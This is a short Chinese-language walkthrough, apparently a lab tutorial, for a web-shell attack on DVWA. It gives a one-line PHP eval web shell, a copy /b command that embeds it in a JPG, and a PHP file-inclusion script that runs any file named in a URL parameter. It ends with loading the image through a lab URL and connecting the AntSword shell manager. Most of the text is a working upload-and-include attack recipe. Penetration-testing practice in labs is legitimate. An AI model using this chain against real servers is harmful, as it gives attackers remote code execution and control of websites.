1. 首先准备一个图片，还有一个脚本，这里的php文件就采用了最简单的一句话木马，具体内容为<?php @eval($_POST['a']);?>，确保两个文件在同一个路径下。
   
   
   2.紧着着按住shift键，然后点击鼠标右键，这时候就会出现“在此处打开powershell”的字眼，点击 进入蓝色窗口，其实我们想通过这样来进入cmd，所以我们用命令start cmd;进入
   
   
   
   3.在cmd中输入 copy shell.jpg /b+txt.php/a jshell.jpg
   -b是指以二进制的方式合并复制文件，用于图像影音类文件
   -a是指以ascii方式合并复制文件，用于文本类文件
   然后发现在原来的路径中已经生成了我们想要的文件
   
   
   4.在靶机环境中上传我们的文件，上传成功会爆路径复制路径到url打开
   
   
   5.但光是上传上去仍然不够，我们还需要一个脚本来执行我们的文件。

<?php

header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
    include $file;
}else{
    show_source(__file__);
}
?>

上传方式有多种，这里我就将dvwa开最低直接传上去了然后我们把爆出来的地址复制到url上最后我们利用file参数将我们之前上传的jshell.jpg文件匹配进去

http://192.168.132.188/DVWA/hackable/uploads/include.php?file=jshell.jpg

6.然后我们开蚁剑进行配置连接，将本网页的url复制进去可以进目录